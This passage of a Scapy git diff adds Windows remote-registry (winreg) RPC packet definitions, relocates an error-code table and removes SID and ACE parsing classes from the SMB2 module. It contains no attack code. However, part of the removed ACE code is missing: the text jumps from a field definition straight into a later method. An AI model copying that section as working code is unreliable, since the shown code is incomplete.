= [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("dwIndex", 0), + NDRPacketField("lpValueNameIn", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField(NDRIntField("lpType", 0)), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpData", + "", + size_is=lambda pkt: (pkt.lpcbData if pkt.lpcbData else 0), + max_is=lambda pkt: 67108864, + length_is=lambda pkt: (pkt.lpcbLen if pkt.lpcbLen else 0), + ) + ), + NDRFullPointerField(NDRIntField("lpcbData", 0)), + NDRFullPointerField(NDRIntField("lpcbLen", 0)), + ] + + +class BaseRegEnumValue_Response(NDRPacket): + fields_desc = [ + NDRPacketField("lpValueNameOut", PRPC_UNICODE_STRING(), PRPC_UNICODE_STRING), + NDRFullPointerField(NDRIntField("lpType", 0)), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpData", + "", + size_is=lambda pkt: (pkt.lpcbData if pkt.lpcbData else 0), + max_is=lambda pkt: 67108864, + length_is=lambda pkt: (pkt.lpcbLen if pkt.lpcbLen else 0), + ) + ), + NDRFullPointerField(NDRIntField("lpcbData", 0)), + NDRFullPointerField(NDRIntField("lpcbLen", 0)), + NDRIntField("status", 0), + ] + + +class BaseRegFlushKey_Request(NDRPacket): + fields_desc = [NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle)] + + +class BaseRegFlushKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class PRPC_SECURITY_DESCRIPTOR(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRConfVarStrLenField( + "lpSecurityDescriptor", + "", + size_is=lambda pkt: pkt.cbInSecurityDescriptor, + length_is=lambda pkt: pkt.cbOutSecurityDescriptor, + ) + ), + NDRIntField("cbInSecurityDescriptor", None, size_of="lpSecurityDescriptor"), + NDRIntField("cbOutSecurityDescriptor", None, size_of="lpSecurityDescriptor"), + ] + + +class BaseRegGetKeySecurity_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("SecurityInformation", 0), + NDRPacketField( + "pRpcSecurityDescriptorIn", + PRPC_SECURITY_DESCRIPTOR(), + PRPC_SECURITY_DESCRIPTOR, + ), + ] + + +class BaseRegGetKeySecurity_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "pRpcSecurityDescriptorOut", + PRPC_SECURITY_DESCRIPTOR(), + PRPC_SECURITY_DESCRIPTOR, + ), + NDRIntField("status", 0), + ] + + +class BaseRegLoadKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("lpFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegLoadKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegOpenKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRIntField("dwOptions", 0), + NDRIntField("samDesired", 0), + ] + + +class BaseRegOpenKey_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phkResult", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class BaseRegQueryInfoKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpClassIn", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegQueryInfoKey_Response(NDRPacket): + fields_desc = [ + NDRPacketField("lpClassOut", PRPC_UNICODE_STRING(), PRPC_UNICODE_STRING), + NDRIntField("lpcSubKeys", 0), + NDRIntField("lpcbMaxSubKeyLen", 0), + NDRIntField("lpcbMaxClassLen", 0), + NDRIntField("lpcValues", 0), + NDRIntField("lpcbMaxValueNameLen", 0), + NDRIntField("lpcbMaxValueLen", 0), + NDRIntField("lpcbSecurityDescriptor", 0), + NDRPacketField("lpftLastWriteTime", PFILETIME(), PFILETIME), + NDRIntField("status", 0), + ] + + +class BaseRegQueryValue_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpValueName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField(NDRIntField("lpType", 0)), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpData", + "", + size_is=lambda pkt: (pkt.lpcbData if pkt.lpcbData else 0), + max_is=lambda pkt: 67108864, + length_is=lambda pkt: (pkt.lpcbLen if pkt.lpcbLen else 0), + ) + ), + NDRFullPointerField(NDRIntField("lpcbData", 0)), + NDRFullPointerField(NDRIntField("lpcbLen", 0)), + ] + + +class BaseRegQueryValue_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRIntField("lpType", 0)), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpData", + "", + size_is=lambda pkt: (pkt.lpcbData if pkt.lpcbData else 0), + max_is=lambda pkt: 67108864, + length_is=lambda pkt: (pkt.lpcbLen if pkt.lpcbLen else 0), + ) + ), + NDRFullPointerField(NDRIntField("lpcbData", 0)), + NDRFullPointerField(NDRIntField("lpcbLen", 0)), + NDRIntField("status", 0), + ] + + +class BaseRegReplaceKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("lpNewFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("lpOldFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegReplaceKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegRestoreKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRIntField("Flags", 0), + ] + + +class BaseRegRestoreKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegSaveKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField( + NDRPacketField( + "pSecurityAttributes", + PRPC_SECURITY_ATTRIBUTES(), + PRPC_SECURITY_ATTRIBUTES, + ) + ), + ] + + +class BaseRegSaveKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegSetKeySecurity_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("SecurityInformation", 0), + NDRPacketField( + "pRpcSecurityDescriptor", + PRPC_SECURITY_DESCRIPTOR(), + PRPC_SECURITY_DESCRIPTOR, + ), + ] + + +class BaseRegSetKeySecurity_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegSetValue_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpValueName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRIntField("dwType", 0), + NDRConfStrLenField("lpData", "", size_is=lambda pkt: pkt.cbData), + NDRIntField("cbData", None, size_of="lpData"), + ] + + +class BaseRegSetValue_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegUnLoadKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegUnLoadKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegGetVersion_Request(NDRPacket): + fields_desc = [NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle)] + + +class BaseRegGetVersion_Response(NDRPacket): + fields_desc = [NDRIntField("lpdwVersion", 0), NDRIntField("status", 0)] + + +class OpenCurrentConfig_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenCurrentConfig_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class PRVALENT(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRPacketField("ve_valuename", PRPC_UNICODE_STRING(), PRPC_UNICODE_STRING) + ), + NDRIntField("ve_valuelen", 0), + NDRFullEmbPointerField(NDRIntField("ve_valueptr", 0)), + NDRIntField("ve_type", 0), + ] + + +class BaseRegQueryMultipleValues_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRConfVarPacketListField( + "val_listIn", + [], + PRVALENT, + size_is=lambda pkt: pkt.num_vals, + length_is=lambda pkt: pkt.num_vals, + ), + NDRIntField("num_vals", None, size_of="val_listIn"), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpvalueBuf", + "", + size_is=lambda pkt: pkt.ldwTotsize, + length_is=lambda pkt: pkt.ldwTotsize, + ) + ), + NDRIntField("ldwTotsize", None, size_of="lpvalueBuf"), + ] + + +class BaseRegQueryMultipleValues_Response(NDRPacket): + fields_desc = [ + NDRConfVarPacketListField( + "val_listOut", + [], + PRVALENT, + size_is=lambda pkt: pkt.num_vals, + length_is=lambda pkt: pkt.num_vals, + ), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpvalueBuf", + "", + size_is=lambda pkt: pkt.ldwTotsize, + length_is=lambda pkt: pkt.ldwTotsize, + ) + ), + NDRIntField("ldwTotsize", None, size_of="lpvalueBuf"), + NDRIntField("status", 0), + ] + + +class BaseRegSaveKeyEx_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpFile", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField( + NDRPacketField( + "pSecurityAttributes", + PRPC_SECURITY_ATTRIBUTES(), + PRPC_SECURITY_ATTRIBUTES, + ) + ), + NDRIntField("Flags", 0), + ] + + +class BaseRegSaveKeyEx_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class OpenPerformanceText_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenPerformanceText_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class OpenPerformanceNlsText_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenPerformanceNlsText_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class BaseRegQueryMultipleValues2_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRConfVarPacketListField( + "val_listIn", + [], + PRVALENT, + size_is=lambda pkt: pkt.num_vals, + length_is=lambda pkt: pkt.num_vals, + ), + NDRIntField("num_vals", None, size_of="val_listIn"), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpvalueBuf", + "", + size_is=lambda pkt: pkt.ldwTotsize, + length_is=lambda pkt: pkt.ldwTotsize, + ) + ), + NDRIntField("ldwTotsize", None, size_of="lpvalueBuf"), + ] + + +class BaseRegQueryMultipleValues2_Response(NDRPacket): + fields_desc = [ + NDRConfVarPacketListField( + "val_listOut", + [], + PRVALENT, + size_is=lambda pkt: pkt.num_vals, + length_is=lambda pkt: pkt.num_vals, + ), + NDRFullPointerField( + NDRConfVarStrLenField( + "lpvalueBuf", + "", + size_is=lambda pkt: pkt.ldwTotsize, + length_is=lambda pkt: pkt.ldwTotsize, + ) + ), + NDRIntField("ldwRequiredSize", 0), + NDRIntField("status", 0), + ] + + +class BaseRegDeleteKeyEx_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRIntField("AccessMask", 0), + NDRIntField("Reserved", 0), + ] + + +class BaseRegDeleteKeyEx_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +WINREG_OPNUMS = { + 0: DceRpcOp(OpenClassesRoot_Request, OpenClassesRoot_Response), + 1: DceRpcOp(OpenCurrentUser_Request, OpenCurrentUser_Response), + 2: DceRpcOp(OpenLocalMachine_Request, OpenLocalMachine_Response), + 3: DceRpcOp(OpenPerformanceData_Request, OpenPerformanceData_Response), + 4: DceRpcOp(OpenUsers_Request, OpenUsers_Response), + 5: DceRpcOp(BaseRegCloseKey_Request, BaseRegCloseKey_Response), + 6: DceRpcOp(BaseRegCreateKey_Request, BaseRegCreateKey_Response), + 7: DceRpcOp(BaseRegDeleteKey_Request, BaseRegDeleteKey_Response), + 8: DceRpcOp(BaseRegDeleteValue_Request, BaseRegDeleteValue_Response), + 9: DceRpcOp(BaseRegEnumKey_Request, BaseRegEnumKey_Response), + 10: DceRpcOp(BaseRegEnumValue_Request, BaseRegEnumValue_Response), + 11: DceRpcOp(BaseRegFlushKey_Request, BaseRegFlushKey_Response), + 12: DceRpcOp(BaseRegGetKeySecurity_Request, BaseRegGetKeySecurity_Response), + 13: DceRpcOp(BaseRegLoadKey_Request, BaseRegLoadKey_Response), + # 14: Opnum14NotImplemented, + 15: DceRpcOp(BaseRegOpenKey_Request, BaseRegOpenKey_Response), + 16: DceRpcOp(BaseRegQueryInfoKey_Request, BaseRegQueryInfoKey_Response), + 17: DceRpcOp(BaseRegQueryValue_Request, BaseRegQueryValue_Response), + 18: DceRpcOp(BaseRegReplaceKey_Request, BaseRegReplaceKey_Response), + 19: DceRpcOp(BaseRegRestoreKey_Request, BaseRegRestoreKey_Response), + 20: DceRpcOp(BaseRegSaveKey_Request, BaseRegSaveKey_Response), + 21: DceRpcOp(BaseRegSetKeySecurity_Request, BaseRegSetKeySecurity_Response), + 22: DceRpcOp(BaseRegSetValue_Request, BaseRegSetValue_Response), + 23: DceRpcOp(BaseRegUnLoadKey_Request, BaseRegUnLoadKey_Response), + # 24: Opnum24NotImplemented, + # 25: Opnum25NotImplemented, + 26: DceRpcOp(BaseRegGetVersion_Request, BaseRegGetVersion_Response), + 27: DceRpcOp(OpenCurrentConfig_Request, OpenCurrentConfig_Response), + # 28: Opnum28NotImplemented, + 29: DceRpcOp( + BaseRegQueryMultipleValues_Request, BaseRegQueryMultipleValues_Response + ), + # 30: Opnum30NotImplemented, + 31: DceRpcOp(BaseRegSaveKeyEx_Request, BaseRegSaveKeyEx_Response), + 32: DceRpcOp(OpenPerformanceText_Request, OpenPerformanceText_Response), + 33: DceRpcOp(OpenPerformanceNlsText_Request, OpenPerformanceNlsText_Response), + 34: DceRpcOp( + BaseRegQueryMultipleValues2_Request, BaseRegQueryMultipleValues2_Response + ), + 35: DceRpcOp(BaseRegDeleteKeyEx_Request, BaseRegDeleteKeyEx_Response), +} +register_dcerpc_interface( + name="winreg", + uuid=uuid.UUID("338CD001-2244-31F1-AAAA-900038001003"), + version="1.0", + opnums=WINREG_OPNUMS, +) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 17fc07ca006..2e0454340a5 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -50,10 +50,10 @@ GSS_S_CONTINUE_NEEDED, GSS_C_FLAGS, ) -from scapy.layers.smb2 import STATUS_ERREF from scapy.layers.smbclient import ( SMB_RPC_SOCKET, ) +from scapy.layers.windows.erref import STATUS_ERREF # RPC from scapy.layers.msrpce.ept import ( @@ -331,6 +331,7 @@ def sr1_req(self, pkt, **kwargs): print( conf.color_theme.opening(">> REQUEST: %s" % pkt.__class__.__name__) ) + # Add sectrailer if first time talking on this interface vt_trailer = b"" if ( @@ -400,6 +401,7 @@ def sr1_req(self, pkt, **kwargs): ): resp[DceRpc5Fault].payload.show() result = resp + if self.verb and getattr(resp, "status", 0) != 0: if resp.status in _DCE_RPC_ERROR_CODES: print(conf.color_theme.fail(f"! {_DCE_RPC_ERROR_CODES[resp.status]}")) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index ded79f15a4d..cf2ee2e868a 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -66,11 +66,11 @@ GSSAPI_BLOB, ) from scapy.layers.smb2 import ( - STATUS_ERREF, SMB2_Compression_Transform_Header, SMB2_Header, SMB2_Transform_Header, ) +from scapy.layers.windows.erref import STATUS_ERREF SMB_COM = { diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index fcfb3702b26..ba6a9292e19 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -15,7 +15,6 @@ import functools import hashlib import os -import re import struct from scapy.automaton import select_objects @@ -28,7 +27,6 @@ ConditionalField, FieldLenField, FieldListField, - FlagValue, FlagsField, IP6Field, IPField, @@ -77,6 +75,7 @@ _NTLM_ENUM, _NTLM_post_build, ) +from scapy.layers.windows.erref import STATUS_ERREF # EnumField @@ -89,62 +88,6 @@ 0x0311: "SMB 3.1.1", } -# SMB2 sect 3.3.5.15 + [MS-ERREF] -STATUS_ERREF = { - 0x00000000: "STATUS_SUCCESS", - 0x00000002: "ERROR_FILE_NOT_FOUND", - 0x00000005: "ERROR_ACCESS_DENIED", - 0x00000103: "STATUS_PENDING", - 0x0000010B: "STATUS_NOTIFY_CLEANUP", - 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", - 0x00000532: "ERROR_PASSWORD_EXPIRED", - 0x00000533: "ERROR_ACCOUNT_DISABLED", - 0x000006FE: "ERROR_TRUST_FAILURE", - 0x80000005: "STATUS_BUFFER_OVERFLOW", - 0x80000006: "STATUS_NO_MORE_FILES", - 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", - 0x80070005: "E_ACCESSDENIED", - 0x8007000E: "E_OUTOFMEMORY", - 0x80090308: "SEC_E_INVALID_TOKEN", - 0x8009030C: "SEC_E_LOGON_DENIED", - 0x8009030F: "SEC_E_MESSAGE_ALTERED", - 0x80090310: "SEC_E_OUT_OF_SEQUENCE", - 0x80090346: "SEC_E_BAD_BINDINGS", - 0x80090351: "SEC_E_SMARTCARD_CERT_REVOKED", - 0xC0000003: "STATUS_INVALID_INFO_CLASS", - 0xC0000004: "STATUS_INFO_LENGTH_MISMATCH", - 0xC000000D: "STATUS_INVALID_PARAMETER", - 0xC000000F: "STATUS_NO_SUCH_FILE", - 0xC0000016: "STATUS_MORE_PROCESSING_REQUIRED", - 0xC0000022: "STATUS_ACCESS_DENIED", - 0xC0000033: "STATUS_OBJECT_NAME_INVALID", - 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", - 0xC0000043: "STATUS_SHARING_VIOLATION", - 0xC0000061: "STATUS_PRIVILEGE_NOT_HELD", - 0xC0000064: "STATUS_NO_SUCH_USER", - 0xC000006D: "STATUS_LOGON_FAILURE", - 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", - 0xC0000070: "STATUS_INVALID_WORKSTATION", - 0xC0000071: "STATUS_PASSWORD_EXPIRED", - 0xC0000072: "STATUS_ACCOUNT_DISABLED", - 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", - 0xC00000BA: "STATUS_FILE_IS_A_DIRECTORY", - 0xC00000BB: "STATUS_NOT_SUPPORTED", - 0xC00000C9: "STATUS_NETWORK_NAME_DELETED", - 0xC00000CC: "STATUS_BAD_NETWORK_NAME", - 0xC0000120: "STATUS_CANCELLED", - 0xC0000122: "STATUS_INVALID_COMPUTER_NAME", - 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions - 0xC000015B: "STATUS_LOGON_TYPE_NOT_GRANTED", - 0xC000018B: "STATUS_NO_TRUST_SAM_ACCOUNT", - 0xC000019C: "STATUS_FS_DRIVER_REQUIRED", - 0xC0000203: "STATUS_USER_SESSION_DELETED", - 0xC000020C: "STATUS_CONNECTION_DISCONNECTED", - 0xC0000225: "STATUS_NOT_FOUND", - 0xC0000257: "STATUS_PATH_NOT_COVERED", - 0xC000035C: "STATUS_NETWORK_SESSION_EXPIRED", -} - # SMB2 sect 2.1.2.1 REPARSE_TAGS = { 0x00000000: "IO_REPARSE_TAG_RESERVED_ZERO", @@ -767,849 +710,6 @@ class FileStreamInformation(Packet): ] -# [MS-DTYP] sect 2.4.1 - - -class WINNT_SID_IDENTIFIER_AUTHORITY(Packet): - fields_desc = [ - StrFixedLenField("Value", b"\x00\x00\x00\x00\x00\x01", length=6), - ] - - def default_payload_class(self, payload): - return conf.padding_layer - - -# [MS-DTYP] sect 2.4.2 - - -class WINNT_SID(Packet): - fields_desc = [ - ByteField("Revision", 1), - FieldLenField("SubAuthorityCount", None, count_of="SubAuthority", fmt="B"), - PacketField( - "IdentifierAuthority", - WINNT_SID_IDENTIFIER_AUTHORITY(), - WINNT_SID_IDENTIFIER_AUTHORITY, - ), - FieldListField( - "SubAuthority", - [0], - LEIntField("", 0), - count_from=lambda pkt: pkt.SubAuthorityCount, - ), - ] - - def default_payload_class(self, payload): - return conf.padding_layer - - _SID_REG = re.compile(r"^S-(\d)-(\d+)((?:-\d+)*)$") - - @staticmethod - def fromstr(x): - m = WINNT_SID._SID_REG.match(x) - if not m: - raise ValueError("Invalid SID format !") - rev, authority, subauthority = m.groups() - return WINNT_SID( - Revision=int(rev), - IdentifierAuthority=WINNT_SID_IDENTIFIER_AUTHORITY( - Value=struct.pack(">Q", int(authority))[2:] - ), - SubAuthority=[int(x) for x in subauthority[1:].split("-")], - ) - - def summary(self): - return "S-%s-%s%s" % ( - self.Revision, - struct.unpack(">Q", b"\x00\x00" + self.IdentifierAuthority.Value)[0], - ( - ("-%s" % "-".join(str(x) for x in self.SubAuthority)) - if self.SubAuthority - else "" - ), - ) - - -# https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers - -WELL_KNOWN_SIDS = { - # Universal well-known SID - "S-1-0-0": "Null SID", - "S-1-1-0": "Everyone", - "S-1-2-0": "Local", - "S-1-2-1": "Console Logon", - "S-1-3-0": "Creator Owner ID", - "S-1-3-1": "Creator Group ID", - "S-1-3-2": "Owner Server", - "S-1-3-3": "Group Server", - "S-1-3-4": "Owner Rights", - "S-1-4": "Non-unique Authority", - "S-1-5": "NT Authority", - "S-1-5-80-0": "All Services", - # NT well-known SIDs - "S-1-5-1": "Dialup", - "S-1-5-113": "Local account", - "S-1-5-114": "Local account and member of Administrators group", - "S-1-5-2": "Network", - "S-1-5-3": "Batch", - "S-1-5-4": "Interactive", - "S-1-5-6": "Service", - "S-1-5-7": "Anonymous Logon", - "S-1-5-8": "Proxy", - "S-1-5-9": "Enterprise Domain Controllers", - "S-1-5-10": "Self", - "S-1-5-11": "Authenticated Users", - "S-1-5-12": "Restricted Code", - "S-1-5-13": "Terminal Server User", - "S-1-5-14": "Remote Interactive Logon", - "S-1-5-15": "This Organization", - "S-1-5-17": "IUSR", - "S-1-5-18": "System (or LocalSystem)", - "S-1-5-19": "NT Authority (LocalService)", - "S-1-5-20": "Network Service", - "S-1-5-32-544": "Administrators", - "S-1-5-32-545": "Users", - "S-1-5-32-546": "Guests", - "S-1-5-32-547": "Power Users", - "S-1-5-32-548": "Account Operators", - "S-1-5-32-549": "Server Operators", - "S-1-5-32-550": "Print Operators", - "S-1-5-32-551": "Backup Operators", - "S-1-5-32-552": "Replicators", - "S-1-5-32-554": r"Builtin\Pre-Windows 2000 Compatible Access", - "S-1-5-32-555": r"Builtin\Remote Desktop Users", - "S-1-5-32-556": r"Builtin\Network Configuration Operators", - "S-1-5-32-557": r"Builtin\Incoming Forest Trust Builders", - "S-1-5-32-558": r"Builtin\Performance Monitor Users", - "S-1-5-32-559": r"Builtin\Performance Log Users", - "S-1-5-32-560": r"Builtin\Windows Authorization Access Group", - "S-1-5-32-561": r"Builtin\Terminal Server License Servers", - "S-1-5-32-562": r"Builtin\Distributed COM Users", - "S-1-5-32-568": r"Builtin\IIS_IUSRS", - "S-1-5-32-569": r"Builtin\Cryptographic Operators", - "S-1-5-32-573": r"Builtin\Event Log Readers", - "S-1-5-32-574": r"Builtin\Certificate Service DCOM Access", - "S-1-5-32-575": r"Builtin\RDS Remote Access Servers", - "S-1-5-32-576": r"Builtin\RDS Endpoint Servers", - "S-1-5-32-577": r"Builtin\RDS Management Servers", - "S-1-5-32-578": r"Builtin\Hyper-V Administrators", - "S-1-5-32-579": r"Builtin\Access Control Assistance Operators", - "S-1-5-32-580": r"Builtin\Remote Management Users", - "S-1-5-32-581": r"Builtin\Default Account", - "S-1-5-32-582": r"Builtin\Storage Replica Admins", - "S-1-5-32-583": r"Builtin\Device Owners", - "S-1-5-64-10": "NTLM Authentication", - "S-1-5-64-14": "SChannel Authentication", - "S-1-5-64-21": "Digest Authentication", - "S-1-5-80": "NT Service", - "S-1-5-80-0": "All Services", - "S-1-5-83-0": r"NT VIRTUAL MACHINE\Virtual Machines", -} - - -# [MS-DTYP] sect 2.4.3 - -_WINNT_ACCESS_MASK = { - 0x80000000: "GENERIC_READ", - 0x40000000: "GENERIC_WRITE", - 0x20000000: "GENERIC_EXECUTE", - 0x10000000: "GENERIC_ALL", - 0x02000000: "MAXIMUM_ALLOWED", - 0x01000000: "ACCESS_SYSTEM_SECURITY", - 0x00100000: "SYNCHRONIZE", - 0x00080000: "WRITE_OWNER", - 0x00040000: "WRITE_DACL", - 0x00020000: "READ_CONTROL", - 0x00010000: "DELETE", -} - - -# [MS-DTYP] sect 2.4.4.1 - - -WINNT_ACE_FLAGS = { - 0x01: "OBJECT_INHERIT", - 0x02: "CONTAINER_INHERIT", - 0x04: "NO_PROPAGATE_INHERIT", - 0x08: "INHERIT_ONLY", - 0x10: "INHERITED_ACE", - 0x40: "SUCCESSFUL_ACCESS", - 0x80: "FAILED_ACCESS", -} - - -class WINNT_ACE_HEADER(Packet): - fields_desc = [ - ByteEnumField( - "AceType", - 0, - { - 0x00: "ACCESS_ALLOWED", - 0x01: "ACCESS_DENIED", - 0x02: "SYSTEM_AUDIT", - 0x03: "SYSTEM_ALARM", - 0x04: "ACCESS_ALLOWED_COMPOUND", - 0x05: "ACCESS_ALLOWED_OBJECT", - 0x06: "ACCESS_DENIED_OBJECT", - 0x07: "SYSTEM_AUDIT_OBJECT", - 0x08: "SYSTEM_ALARM_OBJECT", - 0x09: "ACCESS_ALLOWED_CALLBACK", - 0x0A: "ACCESS_DENIED_CALLBACK", - 0x0B: "ACCESS_ALLOWED_CALLBACK_OBJECT", - 0x0C: "ACCESS_DENIED_CALLBACK_OBJECT", - 0x0D: "SYSTEM_AUDIT_CALLBACK", - 0x0E: "SYSTEM_ALARM_CALLBACK", - 0x0F: "SYSTEM_AUDIT_CALLBACK_OBJECT", - 0x10: "SYSTEM_ALARM_CALLBACK_OBJECT", - 0x11: "SYSTEM_MANDATORY_LABEL", - 0x12: "SYSTEM_RESOURCE_ATTRIBUTE", - 0x13: "SYSTEM_SCOPED_POLICY_ID", - }, - ), - FlagsField( - "AceFlags", - 0, - 8, - WINNT_ACE_FLAGS, - ), - LenField("AceSize", None, fmt=" conditional expression - cond_expr = None - if hasattr(self.payload, "ApplicationData"): - # Parse tokens - res = [] - for ct in self.payload.ApplicationData.Tokens: - if ct.TokenType in [ - # binary operators - 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x88, 0x8e, 0x8f, - 0xa0, 0xa1 - ]: - t1 = res.pop(-1) - t0 = res.pop(-1) - tt = ct.sprintf("%TokenType%") - if ct.TokenType in [0xa0, 0xa1]: # && and || - res.append(f"({t0}) {tt} ({t1})") - else: - res.append(f"{t0} {tt} {t1}") - elif ct.TokenType in [ - # unary operators - 0x87, 0x8d, 0xa2, 0x89, 0x8a, 0x8b, 0x8c, 0x91, 0x92, 0x93 - ]: - t0 = res.pop(-1) - tt = ct.sprintf("%TokenType%") - res.append(f"{tt}{t0}") - elif ct.TokenType in [ - # values - 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0x50, 0x51, 0xf8, 0xf9, - 0xfa, 0xfb - ]: - def lit(ct): - if ct.TokenType in [0x10, 0x18]: # literal strings - return '"%s"' % ct.value - elif ct.TokenType == 0x50: # composite - return "({%s})" % ",".join(lit(x) for x in ct.value) - else: - return str(ct.value) - res.append(lit(ct)) - elif ct.TokenType == 0x00: # padding - pass - else: - raise ValueError("Unhandled token type %s" % ct.TokenType) - if len(res) != 1: - raise ValueError("Incomplete SDDL !") - cond_expr = "(%s)" % res[0] - return { - "ace-flags-string": ace_flag_string, - "sid-string": sid_string, - "mask": mask, - "object-guid": object_guid, - "inherited-object-guid": inherit_object_guid, - "cond-expr": cond_expr, - } - # fmt: on - - def toSDDL(self, accessMask=None): - """ - Return SDDL - """ - data = self.extractData(accessMask=accessMask) - ace_rights = "" # TODO - if self.AceType in [0x9, 0xA, 0xB, 0xD]: # Conditional ACE - conditional_ace_type = { - 0x09: "XA", - 0x0A: "XD", - 0x0B: "XU", - 0x0D: "ZA", - }[self.AceType] - return "D:(%s)" % ( - ";".join( - x - for x in [ - conditional_ace_type, - data["ace-flags-string"], - ace_rights, - str(data["object-guid"]), - str(data["inherited-object-guid"]), - data["sid-string"], - data["cond-expr"], - ] - if x is not None - ) - ) - else: - 